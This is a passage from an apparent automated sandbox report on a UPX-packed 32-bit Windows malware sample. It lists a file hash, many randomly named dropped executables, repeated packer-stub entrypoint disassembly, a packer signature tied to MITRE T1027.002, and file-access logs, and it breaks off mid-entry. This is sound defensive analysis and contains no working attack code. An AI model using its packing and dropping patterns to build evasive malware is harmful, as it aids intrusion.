"\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has an executable section named \"UPX0\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has an executable section named \"UPX1\"\n \"bphvxnd.exe\" has an executable section named \"UPX0\"\n \"bphvxnd.exe\" has an executable section named \"UPX1\"\n \"ndjtrh.exe\" has an executable section named \"UPX0\"\n \"ndjtrh.exe\" has an executable section named \"UPX1\"\n \"lhfrhnr.exe\" has an executable section named \"UPX0\"\n \"lhfrhnr.exe\" has an executable section named \"UPX1\"\n \"482064.exe\" has an executable section named \"UPX0\"\n \"482064.exe\" has an executable section named \"UPX1\"\n \"202048.exe\" has an executable section named \"UPX0\"\n \"202048.exe\" has an executable section named \"UPX1\"\n \"48866.exe\" has an executable section named \"UPX0\"\n \"48866.exe\" has an executable section named \"UPX1\"\n \"hrffr.exe\" has an executable section named \"UPX0\"\n \"hrffr.exe\" has an executable section named \"UPX1\"\n \"nfbjp.exe\" has an executable section named \"UPX0\"\n \"nfbjp.exe\" has an executable section named \"UPX1\"\n \"6064442.exe\" has an executable section named \"UPX0\"\n \"6064442.exe\" has an executable section named \"UPX1\"\n \"44424.exe\" has an executable section named \"UPX0\"\n \"44424.exe\" has an executable section named \"UPX1\"\n \"pdjrtdv.exe\" has an executable section named \"UPX0\"\n \"pdjrtdv.exe\" has an executable section named \"UPX1\"\n \"bvffnn.exe\" has an executable section named \"UPX0\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bphvxnd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ndjtrh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lhfrhnr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"482064.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"202048.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"48866.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hrffr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"nfbjp.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6064442.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"44424.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"pdjrtdv.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"bvffnn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fplrrnr.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"lrnlbrl.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0086084.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"22004.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"4688248.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0288086.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vvtbdn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"dbhlfn.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ptxnnrh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"xxfflb.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"44680.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"0024648.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bphvxnd.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ndjtrh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lhfrhnr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"482064.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"202048.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"48866.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"hrffr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"nfbjp.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6064442.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"44424.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"pdjrtdv.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"bvffnn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fplrrnr.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"lrnlbrl.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0086084.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"22004.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"4688248.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0288086.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"vvtbdn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"dbhlfn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ptxnnrh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"xxfflb.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"44680.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"0024648.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bphvxnd.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ndjtrh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lhfrhnr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"482064.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"202048.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"48866.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"hrffr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"nfbjp.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"6064442.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"44424.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"pdjrtdv.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"bvffnn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"fplrrnr.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"lrnlbrl.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0086084.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"22004.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"4688248.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0288086.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"vvtbdn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"dbhlfn.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"ptxnnrh.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"xxfflb.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"44680.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"\n \"0024648.exe\" was detected as \"UPX v1.25 (Delphi) Stub\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"bbhhn.exe\" trying to access non-existent file \"c:\\FLTLIB.DLL\"\n \"bbhhn.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"bbhhn.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"bbhhn.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"bbhhn.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"bbhhn.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡°¡\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"c:\\bbhhn.exe\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"5032d656bb93de0d6edb240ea94ce3780ace041897a62eb59561af7fbba0e60e.exe\" trying to touch 